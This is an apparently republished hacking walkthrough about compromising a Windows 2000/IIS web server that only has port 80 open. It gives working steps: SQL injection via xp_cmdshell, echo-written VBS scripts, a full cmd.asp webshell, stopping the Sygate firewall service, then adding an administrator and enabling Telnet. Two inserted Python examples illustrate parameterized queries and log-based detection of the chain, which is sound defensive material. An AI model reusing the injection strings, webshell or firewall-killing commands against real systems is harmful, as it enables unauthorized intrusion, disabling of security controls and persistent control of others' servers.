Ideas for getting into a host that only has port 80 open

xiaoxiao2021-03-06  36

Host configuration: Windows 2000 Server (SP3) with Sygate Personal Firewall Pro. Security setting: without going into detail, in practice only port 80 is allowed inbound.

Scanning: X-Scan 2.3 was first run against port 80 only, then as a full sweep, with the same result; evidently the administrator is not careless. Checking the system: the host does not answer ping, but the scan result is clear enough: it should be IIS 5 with a web site on it, and such a host is of course Win2K.

Analysis: the page /mingce/student1.asp returned "Microsoft OLE DB Provider for ODBC Drivers error (0x80040e14)" pointing at line 30, which looks bad: there should be SQL injection there. To confirm, the login page at http://xxx was tested. The relevant part of the ASP source reads:

... = "" THEN
set conn = Server.CreateObject("ADODB.Connection")
conn.open "driver={SQL Server};server=localhost;database=xxxx;uid=sa;pwd=" & Application("mm_xxx")

(The original is longer.) These three lines are the important ones. They show that the ASP back end applies no filtering at all to user input, that the database is queried through ADODB.Connection (with ADODB.Command the special characters could not have been used this way), and of course that the database connection is made as sa.

(Tip: even without the ASP source one can try xp_cmdshell 'iisreset /reboot' or xp_cmdshell 'ping your.ip'. If the first command runs, the remote system reboots; the second normally makes the host send ICMP packets to your address, but this host blocks all other traffic, so the second command may show nothing.)

What the analysis gives us: system commands run as administrator through the web page (but with no output returned). On an ordinary host xp_cmdshell 'net user ...' would follow; I won't write that out.
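The root cause the analysis above identifies is a query assembled by string concatenation from unfiltered form input, run over a connection opened as sa. The following is an added example, not code from the original post, that puts that pattern next to its parameterized counterpart. sqlite3 stands in for the ADODB/SQL Server pair on the page, and the table, rows and inputs are constructed for the demonstration; the login functions themselves are assumptions about how the page's login was written.

```python
"""Vulnerable string-concatenated login query beside a parameterized one.

sqlite3 is a stand-in for the ADODB.Connection / SQL Server setup on the page.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the site's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_concat(conn: sqlite3.Connection, name: str, pwd: str) -> bool:
    """The page's pattern: form input spliced straight into the SQL text.

    A quote inside `name` or `pwd` changes the structure of the statement.
    """
    sql = ("SELECT COUNT(*) FROM users WHERE name = '" + name
           + "' AND pwd = '" + pwd + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_concat_status(conn: sqlite3.Connection, name: str, pwd: str) -> str:
    """Classifies what the concatenated query does for a given input.

    A syntax error here is the same class of symptom as the ODBC 0x80040e14
    error the post saw on student1.asp: the input reached the SQL parser.
    """
    try:
        return "granted" if login_concat(conn, name, pwd) else "denied"
    except sqlite3.OperationalError:
        return "syntax error"


def login_param(conn: sqlite3.Connection, name: str, pwd: str) -> bool:
    """Hardened form: the driver binds the values, so quotes stay data.

    The equivalent on the page's stack is ADODB.Command with parameters; the
    connection should also use a low-privilege login rather than sa, so that a
    remaining bug cannot reach xp_cmdshell at all.
    """
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND pwd = ?"
    return conn.execute(sql, (name, pwd)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("alice", "s3cret"), ("o'neil", "x"), ("' OR 1=1 --", "")]:
        print(repr(user), "concat:", login_concat_status(db, user, pw),
              "| param:", "granted" if login_param(db, user, pw) else "denied")
```

The parameterized version denies both the apostrophe name and the `OR 1=1` input, while the concatenated one errors on the first and grants the second. Binding parameters is only half of the fix the page points at: the other half is the sa connection, which is a configuration change rather than code.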
But this system only has port 80 open: even if we can add an admin user, remote management normally needs 139/445/135 open, and that does not work here. My plan: 1) find the path of the web directory; 2) write a simple cmd.asp to find the exact name of the firewall; 3) stop the firewall service.

Step 1 is the hardest. I originally intended to use the adminscripts to create a web site pointing at a directory I could execute from, then thought of the adsutil.vbs program. What I did was:

xp_cmdshell 'cmd /c cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/1/root > a.txt'; --

Not very long :) Through it the settings of the first virtual web site in IIS (including its directory) are dumped to a.txt; a.txt naturally lands in C:\WINNT\system32, which is not a problem in itself. But if the administrator has deleted adsutil.vbs or moved it elsewhere there is no way around it (it is impossible to write one with the echo command).

Step 2: write the following code into C:\ with echo, line by line. There are a lot of lines, I won't count them :)

xp_cmdshell 'echo set fso1 = createobject("scripting.filesystemobject") > c:\read.vbs'; --
xp_cmdshell 'echo set wshshell = wscript.createobject("wscript.shell") >> c:\read.vbs'; --
.....

------------------- read.vbs ---------------------------------
set fso1 = createobject("scripting.filesystemobject")
set wshshell = wscript.createobject("wscript.shell")
spa = wshshell.environment("process")("windir")
set fil = fso1.opentextfile(spa & "\system32\aa.txt")
do while not fil.atendofstream
    nr = fil.readline
    if left(nr, 4) = "path" then
        pa = mid(nr, instr(nr, ")") + 3, len(nr) - instr(nr, ")") - 3)
        exit do
    end if
loop
set fil1 = fso1.opentextfile(pa & "\dd.asp", 2, true)
fil1.writeline "<% response.write request.servervariables(""
------------------- Cut here ---------------------------------

Step 3: of course, execute read.vbs, so that it reads aa.txt to find the actual path of the web site and writes a file called dd.asp in the root of the web site. Then request http://xxxx/dd.asp; it returned D:\xxx, so it seems I was lucky. (One problem: the first web site we find may not be the one reachable through xxxx.)

Step 4: generate cmd.asp with the echo command. It is not long, about 20 lines. On some sites (usually shared virtual hosts) cmd.asp cannot be executed, but this host is a standalone server.
So the administrator has not blocked it.

------------------------ cmd.asp ------------------------
<% on error resume next
set oscript = server.createobject("wscript.shell")
set oscriptnet = server.createobject("wscript.network")
set ofilesys = server.createobject("scripting.filesystemobject")
szcmd = request.form(".cmd")
if (szcmd <> "") then
    sztempfile = "c:\" & ofilesys.gettempname()
    call oscript.run("cmd.exe /c " & szcmd & " > " & sztempfile, 0, true)
    set ofile = ofilesys.opentextfile(sztempfile, 1, false, 0)
end if
%>
... method="POST">
<% if (isobject(ofile)) then
    on error resume next
    response.write server.htmlencode(ofile.readall)
    ofile.close
    call ofilesys.deletefile(sztempfile, true)
end if %>
------------------------ Cut here ------------------------

Step 5: run commands through cmd.asp to find out which firewall is on the system. I found it at E:\progra~1\sygate\spf, which needs no explanation: Sygate Personal Firewall Pro (for the exact version, do echo readme.txt in cmd.asp).

Step 6: stop Sygate's firewall:

a'; exec master..xp_cmdshell '; --

(SMCService is the service name of the Sygate firewall.)

Step 7: after that succeeded, take another look. Scanning with X-Scan now shows 53, 139, 135, 1433 ..... all open.

Step 8: add a system administrator account and open Telnet ............ And that's how it went.

Actually I think there is a better way that I just didn't think of: write an FTP script with the echo command to download an HTTPTunnel and then open Telnet .... Of course you might also want a simpler route, which is to guess the actual directory of the web site ... IIS has the LockDown tool, which writes much stricter ACLs on the WWW directories; that would make things somewhat better. I think 2K is more reliable than people imagine. Generally speaking, using its TCP/IP filtering to limit the served ports (80) and, if necessary, adding some IPSec policies can prevent a variety of attacks quite well.
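The closing advice stops at port filtering and ACLs; the chain described in the steps above also leaves a distinctive trail in the IIS logs (application errors on .asp pages, injection markers in query strings, requests for .asp files that are not part of the site, such as dd.asp and cmd.asp). The following is an added example, not code from the original post, that scans W3C extended log lines for those traces. The log lines, the site baseline and the field order are all constructed for the demonstration; the field order is an assumption about how the IIS 5 log was configured.

```python
"""Scan IIS W3C extended log lines for the traces of an injection-to-webshell chain.

Everything below (log lines, field layout, site baseline) is constructed sample data.
"""
import re
from urllib.parse import unquote

# Assumed #Fields order for this sample; real deployments vary, so read the
# "#Fields:" header of the actual log before relying on fixed positions.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# Constructed sample log. Addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-01 10:00:01 203.0.113.5 GET /mingce/student1.asp id=12 200
2003-05-01 10:00:07 203.0.113.5 GET /mingce/student1.asp id=12' 500
2003-05-01 10:01:30 203.0.113.5 POST /login.asp - 500
2003-05-01 10:02:10 203.0.113.5 GET /mingce/student1.asp id=1';exec%20master..xp_cmdshell%20'dir';-- 500
2003-05-01 10:05:00 203.0.113.5 GET /dd.asp - 200
2003-05-01 10:06:00 203.0.113.5 POST /cmd.asp - 200
2003-05-01 10:06:30 198.51.100.7 GET /index.asp - 200
"""

# Constructed baseline of the .asp pages that legitimately exist on the site.
KNOWN_PAGES = {"/index.asp", "/login.asp", "/mingce/student1.asp"}

# Markers of SQL injection attempts in a decoded query string.
INJECTION_MARKERS = re.compile(r"(xp_cmdshell|exec\s+master|';|--)", re.IGNORECASE)


def parse(log_text: str) -> list:
    """Turn W3C log text into dicts keyed by FIELDS, decoding the query string."""
    rows = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(FIELDS):
            continue  # malformed or differently configured line; skip it
        row = dict(zip(FIELDS, parts))
        row["cs-uri-query"] = unquote(row["cs-uri-query"])
        rows.append(row)
    return rows


def findings(rows: list) -> list:
    """Return (kind, client-ip, uri-stem) tuples for suspicious requests.

    asp-500:     an .asp page raised an application error (the ODBC error the
                 post describes is surfaced this way). Note that IIS logs do not
                 record POST bodies, so a form-based injection shows up only here.
    sqli-query:  injection markers in the (decoded) query string.
    unknown-asp: an .asp path outside the site baseline, e.g. a dropped webshell.
    """
    out = []
    for r in rows:
        stem = r["cs-uri-stem"].lower()
        query = r["cs-uri-query"]
        status = r["sc-status"]
        if stem.endswith(".asp") and status == "500":
            out.append(("asp-500", r["c-ip"], stem))
        if INJECTION_MARKERS.search(query):
            out.append(("sqli-query", r["c-ip"], stem))
        if stem.endswith(".asp") and stem not in KNOWN_PAGES:
            out.append(("unknown-asp", r["c-ip"], stem))
    return out


def summarize(found: list) -> dict:
    """Map each client IP to the sorted list of finding kinds seen from it."""
    summary = {}
    for kind, ip, _stem in found:
        summary.setdefault(ip, set()).add(kind)
    return {ip: sorted(kinds) for ip, kinds in summary.items()}


if __name__ == "__main__":
    hits = findings(parse(SAMPLE_LOG))
    for kind, ip, stem in hits:
        print(f"{kind:12} {ip:15} {stem}")
    print(summarize(hits))
```

The three finding kinds line up with the post's steps: the 500s are the probing of student1.asp and the login form, the query-string marker is the xp_cmdshell call, and the unknown .asp paths are dd.asp and cmd.asp being requested. A single client showing all three kinds within minutes is the pattern worth alerting on; the baseline of known pages is the part that needs maintaining per site.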

Please credit the original source when reposting: https://www.9cbs.com/read-66174.html
